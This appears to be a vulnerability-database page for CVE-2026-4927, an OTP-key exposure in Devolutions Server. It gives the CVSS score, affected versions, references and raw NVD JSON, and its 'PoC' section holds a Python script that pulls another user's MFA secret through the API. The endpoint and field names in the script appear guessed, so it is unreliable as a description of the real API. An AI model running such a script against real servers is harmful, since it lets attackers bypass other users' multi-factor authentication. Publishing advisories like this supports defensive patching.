CVE-2026-4927

Description

Exposure of sensitive information in the users MFA feature in Devolutions Server allows users with user management privileges to obtain other users OTP keys via an authenticated API request. This issue affects Server: from 2026.1.6 through 2026.1.11.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE

Devolutions Server 2026.1.6

Devolutions Server 2026.1.7

Devolutions Server 2026.1.8

Devolutions Server 2026.1.9

Devolutions Server 2026.1.10

Devolutions Server 2026.1.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Target URL (Example)
base_url = "https://target-server.com"
api_endpoint = "/api/v1/users/{user_id}/mfa"

# Attacker's credentials with user management privileges
auth_token = "ATTACKER_JWT_TOKEN"
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json"
}

# Target user ID to compromise
target_user_id = "12345"

try:
    # Send authenticated API request to fetch MFA settings
    response = requests.get(f"{base_url}{api_endpoint.format(user_id=target_user_id)}", headers=headers, verify=False)
    
    if response.status_code == 200:
        data = response.json()
        # Extract the sensitive OTP key from the response
        otp_secret = data.get('otpSecret') or data.get('mfa_secret')
        
        if otp_secret:
            print(f"[+] Successfully leaked OTP Key for user {target_user_id}: {otp_secret}")
        else:
            print("[-] OTP Key not found in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4927
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4927
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4927/
[4] VulDB https://vuldb.com/cve/CVE-2026-4927
[5] https://devolutions.net/security/advisories/DEVO-2026-0010

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4927", "sourceIdentifier": "[email protected]", "published": "2026-04-01T16:23:51.870", "lastModified": "2026-04-03T19:14:03.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information in the users MFA feature in Devolutions Server allows users with user management privileges to obtain other users OTP keys via an authenticated API request.\n\n\n\nThis issue affects Server: from 2026.1.6 through 2026.1.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.1.6.0", "versionEndExcluding": "2026.1.12.0", "matchCriteriaId": "C03E8B95-397C-465C-BE01-810DC9852675"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2026-0010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}